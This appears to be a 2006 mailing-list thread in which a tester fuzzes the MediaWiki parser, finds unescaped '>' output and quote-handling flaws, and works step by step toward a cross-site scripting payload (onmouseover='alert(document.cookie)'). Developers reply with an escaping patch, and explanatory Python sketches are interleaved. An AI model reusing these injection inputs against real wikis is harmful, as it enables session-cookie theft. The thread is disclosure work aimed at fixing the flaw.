- Why does MediaWiki ever allow unescaped ">" characters? This
behaviour seems to increase the chances of a JavaScript security problem.
It doesn't, modulo uncaught bugs.
Well, all I can tell you is that this is the behaviour that I observe.
But you don't have to take my word for it; see for yourself here:
* Unescaped ">" characters in the HTML output: http://nickj.org/MediaWiki/Parser11
* Wiki Source: http://nickj.org/Special:Export/MediaWiki/Parser11
* Site is running MediaWiki 1.5.6: http://nickj.org/Special:Version
Note that I'm looking at the Parser purely from a black-box-testing perspective: I give it certain input, and observe what it does. I'm not looking at it from a source-code or design-level perspective (i.e. what it should do). Then as a human, I automatically try to spot the patterns in the behaviour that I observe, and from that construct a mental model that explains what the Parser is doing. And currently that says: the ">" character does not appear to be escaped until after the "<" character is used.
Disclaimer: I have modified the MediaWiki source of this installation a little, but only to add limited ACLs, and change 2 or 3 minor things in the default page layout that I disliked. As far as I am aware, nothing that I have changed will modify the behaviour of the Parser (but of course, I could be wrong).
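The black-box check described above (feed the Parser some input, then look for raw ">" characters in the HTML it emits) can be sketched in a few lines of Python. This is only an illustration: the function name `find_stray_gt` is hypothetical, and the scanner is deliberately naive, treating everything between a "<" and the next ">" as a tag and ignoring quoted attribute values and comments.

```python
def find_stray_gt(html: str) -> list[int]:
    """Return the offsets of '>' characters that are not closing a tag."""
    stray = []
    in_tag = False
    for offset, ch in enumerate(html):
        if ch == "<":
            in_tag = True
        elif ch == ">":
            if in_tag:
                in_tag = False        # this '>' closes the tag opened earlier
            else:
                stray.append(offset)  # raw '>' sitting in text content
    return stray


# Assumed sample: a paragraph whose text is five raw '>' characters.
sample = "<p>>>>>>\n</p>"
print(find_stray_gt(sample))
```

Run against saved Parser output, a non-empty result flags places where ">" reached the page unescaped; it says nothing about whether that is exploitable.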
This is thanks to the wacky multi-pass parser. As a quick hack-around:
--- includes/Sanitizer.php.prev 2006-03-30 23:50:58.000000000 -0800
+++ includes/Sanitizer.php 2006-03-30 23:48:59.000000000 -0800
@@ -577,6 +577,9 @@
 # Templates and links may be expanded in later parsing,
 # creating invalid or dangerous output. Suppress this.
 $value = strtr( $value, array(
+ '<' => '&lt;', // This should never happen,
+ '>' => '&gt;', // we've received invalid input
+ '"' => '&quot;', // which should have been escaped.
Question: will this break wikis with $wgRawHtml on? (Used to embed arbitrary HTML.)
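For readers who don't speak PHP, the effect of the quoted hack-around can be approximated in Python. This is a sketch under the assumption that the three added mappings turn "<", ">" and the double quote into the entities &lt;, &gt; and &quot;; the names `ATTRIBUTE_ESCAPES` and `escape_attribute_value` are made up for illustration and are not MediaWiki identifiers.

```python
# Assumed equivalent of the three strtr() mappings in the quoted patch:
# each single character is replaced by its HTML entity.
ATTRIBUTE_ESCAPES = str.maketrans({
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
})


def escape_attribute_value(value: str) -> str:
    """Escape characters that should never appear raw in an attribute value."""
    return value.translate(ATTRIBUTE_ESCAPES)


print(escape_attribute_value('<span style="font-weight: bold;">'))
```

The sketch only shows what the mapping does to a single attribute value. It does not answer the $wgRawHtml question, which depends on where in the parsing passes this function is called.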
Also, thank you, because the above code snippet suggested a way around the "'>' character does not appear to be escaped until after the '<' character is used" restriction.
What you do is use templates, and then we can completely bypass this restriction.
E.g. whereas before, if we had one article with wiki text like this:
------------------------------------
>>>>>
{| BGCOLOR=<span style="font-weight: bold;">
>>>>>
------------------------------------
... then it would produce HTML output like this:
------------------------------------
<p>>>>>>
</p>
<table bgcolor="<span">
&gt;&gt;&gt;&gt;&gt;
</span>
</table>
------------------------------------
Instead, we now have one article, and one template. For the template (call it "Template:OpenTag") we have:
------------------------------------
{| BGCOLOR=<span style="font-weight: bold;">
------------------------------------
Then in the article we have:
------------------------------------
>>>>>
{{OpenTag}}
>>>>>
------------------------------------
Which now renders as this HTML output:
------------------------------------
<p>>>>>>
</p>
<table bgcolor="<span">
>>>>>
------------------------------------
Note that the second ">>>>>" is no longer escaped now, despite the "<" being included in the HTML output based on user-supplied input.
Maybe it'll come in useful and maybe it won't, but either way it's one less restriction.
Hi Nick - very interesting post :) I don't know anything of how MediaWiki works, but I'm curious why you're allowed HTML of the form <U>aoeu</U>. How does that work, and will that help your nefarious goal?
Well the "<U>aoeu</U>" might help, if we could get the Parser to start an underline tag, but not close it.
For example, if we could come up with some wiki-text input that would produce this output:
------------------------------------
<U foo="
<p>Some text</p>
" onmouseover="alert(document.cookie)">test</u>
------------------------------------
In other words, we want "<U", not "<U>" in the output. I.e. we want to confuse the Parser, to get it to stuff up the normal flow of tags in the HTML output, and start something that it doesn't finish.
Note that enabling Tidy probably won't provide any protection here. In fact, it may even make things worse, by adding in tags for us. For example, if we can get this output (i.e. same as above, but missing "</u>"):
------------------------------------
<U foo="
<p>Some text</p>
" onmouseover="alert(document.cookie)">test
------------------------------------
Then Tidy will helpfully supply the missing "</u>" for us, and clean things up a little, which will give us this:
------------------------------------
<u foo="<p>Some text</p>" onmouseover="alert(document.cookie)">test</u>
------------------------------------
And then the browser will ignore the attributes it doesn't understand, giving this:
------------------------------------
<u onmouseover="alert(document.cookie)">test</u>
------------------------------------
... which will allow us to execute JavaScript. So, it was really the '<U foo="' bit that I was looking for.
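To see why an unterminated '<U foo="' is the interesting part, it helps to watch an HTML parser consume the target output. The sketch below uses Python's standard html.parser module as a stand-in for a browser (an assumption; real browsers and Tidy have their own parsers and may differ in detail). The class and function names are hypothetical.

```python
from html.parser import HTMLParser


class StartTagCollector(HTMLParser):
    """Record every start tag the parser sees, with its attributes."""

    def __init__(self):
        super().__init__()
        self.start_tags = []

    def handle_starttag(self, tag, attrs):
        self.start_tags.append((tag, dict(attrs)))


def collect_start_tags(html: str):
    parser = StartTagCollector()
    parser.feed(html)
    parser.close()
    return parser.start_tags


# The hoped-for output from the message above, with the paragraph
# swallowed by the quoted "foo" attribute.
target = '<U foo="\n<p>Some text</p>\n" onmouseover="alert(document.cookie)">test</u>'
for tag, attrs in collect_start_tags(target):
    print(tag, sorted(attrs))
```

In this sketch the "<p>" never shows up as a tag of its own, because it sits inside the quoted value of "foo", while "onmouseover" is reported as a genuine attribute of the "u" element.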
Through automated fuzz-style testing, I've since found something that behaves in almost exactly this way (which demonstrates that if you throw enough fuzz-style input at something, you'll probably get it to squeal). In particular, this wiki input:
------------------------------------
{|
|
|[ftp://|x||]
------------------------------------
... generates this output:
------------------------------------
<table>
<tr>
<td><a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a>
------------------------------------
... which looks OK, until you look closer:
------------------------------------
<a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a>
        ^OPEN-QUOTES            ^CLOSE-QUOTES ^OPEN-QUOTES-AGAIN (... and then never closes them)
------------------------------------
Somewhere in between the first OPEN-QUOTES and the CLOSE-QUOTES, the MediaWiki Parser loses full control of the situation, because the "external" and "free" bits here are being treated as HTML attributes, and I can be quite sure that the MediaWiki folks never intended for that to happen (what they wanted was for these to be treated as the _value_ of an HTML attribute).
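The quote bookkeeping in the annotated fragment above can be checked mechanically. A minimal sketch, assuming only double quotes matter and ignoring everything else about HTML syntax; `quote_segments` is a hypothetical helper name.

```python
def quote_segments(markup: str):
    """Split markup on double quotes and label each piece by quote state.

    Pieces at even positions lie outside quotes, pieces at odd positions
    lie inside them.
    """
    pieces = markup.split('"')
    return [("inside" if i % 2 else "outside", piece)
            for i, piece in enumerate(pieces)]


fragment = '<a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a>'
segments = quote_segments(fragment)
quotes_balanced = fragment.count('"') % 2 == 0

for state, piece in segments:
    print(f"{state:8} {piece!r}")
print("balanced:", quotes_balanced)
```

With this fragment, 'external free' lands in an "outside" segment (so it reads as attribute names rather than a value), and the odd number of quotes means the last segment is opened but never closed.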
We can then add the onmouseover stuff to the wiki input:
------------------------------------
{|
|
|[ftp://|x||]" onmouseover="alert(document.cookie)">test
------------------------------------
... then this results in the Parser giving us this output:
------------------------------------
<table>
<tr>
<td><a href="ftp://|x</td><td class="external free">x</td><td>x</td><td></a>" onmouseover="alert(document.cookie)">test
------------------------------------
(Above output+input available online at: http://nickj.org/MediaWiki/Parser12 and http://nickj.org/Special:Export/MediaWiki/Parser12 )
The above output is exceedingly close to what we want. In fact, at this stage, we've solved all the previous problems, but unfortunately we've come across one last unexpected new problem: the 'class="external free"' stuff. For example, if we could get it to be this (i.e. one extra "=" symbol at the end of the class string):
------------------------------------
<td><a href="ftp://|x</td><td class="external free=">x</td><td>x</td><td></a>" onmouseover="alert(document.cookie)">test
------------------------------------
.... then Tidy will convert it to this:
------------------------------------
<a href="ftp://|x%3C/td%3E%3Ctd%20class=" external="" free=">x</td><td>x</td><td></a>" onmouseover="alert(document.cookie)">test</a>
------------------------------------
.... which will work. So, we're one "=" away from success. Either that, or find a way to remove the 'class="external free"' bit, which will also work. Or, find a way to delay it until after the onmouseover, and that will also work. Or, find a way to make it use single quotes instead of double quotes for the class (i.e. class='external free', rather than class="external free"), and that will work too.
So there are at least 4 possibilities, only one of which has to work.
Again, if anyone knows of a way to do any of these, or improve on the above, then please let me know.
> your nefarious goal
I'd feel a whole lot more nefarious if I wasn't telling the MediaWiki people all about it, and thereby suggesting ways of making such attacks harder ;-)
All the best, Nick.